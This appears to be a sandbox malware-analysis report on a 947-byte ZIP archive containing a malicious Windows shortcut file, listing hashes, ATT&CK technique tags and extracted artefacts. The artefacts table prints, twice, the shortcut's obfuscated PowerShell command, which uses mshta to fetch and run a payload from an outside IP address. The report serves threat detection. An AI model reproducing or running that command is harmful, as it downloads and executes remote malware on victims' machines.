Malicious
147f7eb48a69d39dc6066a62d6f3dc39c7ab77[...]640.zip
ZIP Archive | MD5: c3d723ebc64f8deaec8c8328ba10e7b8 | Size: 947 B | application/zip
ZIP Archive
MD5: c3d723ebc64f8deaec8c8328ba10e7b8
Size: 947 B
application/zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | c3d723ebc64f8deaec8c8328ba10e7b8
|
| Sha1 | b941b7dab41cb4ecd706d34d8006e5e74818fc58
|
| Sha256 | 19047e4107ff36cc058b20901898ca996d49b2eb4fbb08f929e717c7a836883a
|
| Sha384 | 90ffcb68be859a7b126ee3edcc2e1b283ef418a09dedc41d3115a04dc7ab8518fc0012b928734edde3aaf3780131a7f7
|
| Sha512 | d697e611454644d5c4372ccb6d8aa1839359b71c727fcad78eb5170c02d4429c5c5409b6e43eefc64009c644fd13779600e7d91d65c8009dec95d35de99e9909
|
| SSDeep | 24:XPJxewO0gzIf8wAz8PUhzROlgdS6e3sMqoivIAJxewOl:XZOHzIkwe8PUhz8T6ejqoiwwOl
|
| TLSH | 0D115441813B380DFA0226FE2E4459A41A94548B9FCB893DC5480568E5BE6849B8B8BD
|
File Structure
147f7eb48a69d39dc6066a62d6f3dc39c7ab77d21d51b0ca1f9c7f69cea9a640.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
147f7eb48a69d39dc6066a62d6f3dc39c7ab77d21d51b0ca1f9c7f69cea9a640.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe scb ('%%%m%%shta% h%%ttp%%%://91%.%%%%2%%%00.1%%%4.%%%%15%%%%3/Do%%wnl%%%%o%%%%a%%%%ds%%%%/%%%w%i%%%%n%%%%d%%%%o%%%%w_%%%%order%.%m%%%%p%%4%%%%'.replace('%',''));iex (gcb) |
147f7eb48a69d39dc6066a62d6f3dc39c7ab77d21d51b0ca1f9c7f69cea9a640.zip (947 B)
File Structure
147f7eb48a69d39dc6066a62d6f3dc39c7ab77d21d51b0ca1f9c7f69cea9a640.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
147f7eb48a69d39dc6066a62d6f3dc39c7ab77d21d51b0ca1f9c7f69cea9a640.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe scb ('%%%m%%shta% h%%ttp%%%://91%.%%%%2%%%00.1%%%4.%%%%15%%%%3/Do%%wnl%%%%o%%%%a%%%%ds%%%%/%%%w%i%%%%n%%%%d%%%%o%%%%w_%%%%order%.%m%%%%p%%4%%%%'.replace('%',''));iex (gcb) Malicious |
147f7eb48a69d39dc6066a62d6f3dc39c7ab77d21d51b0ca1f9c7f69cea9a640.zip > 147f7eb48a69d39dc6066a62d6f3dc39c7ab77d21d51b0ca1f9c7f69cea9a640.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.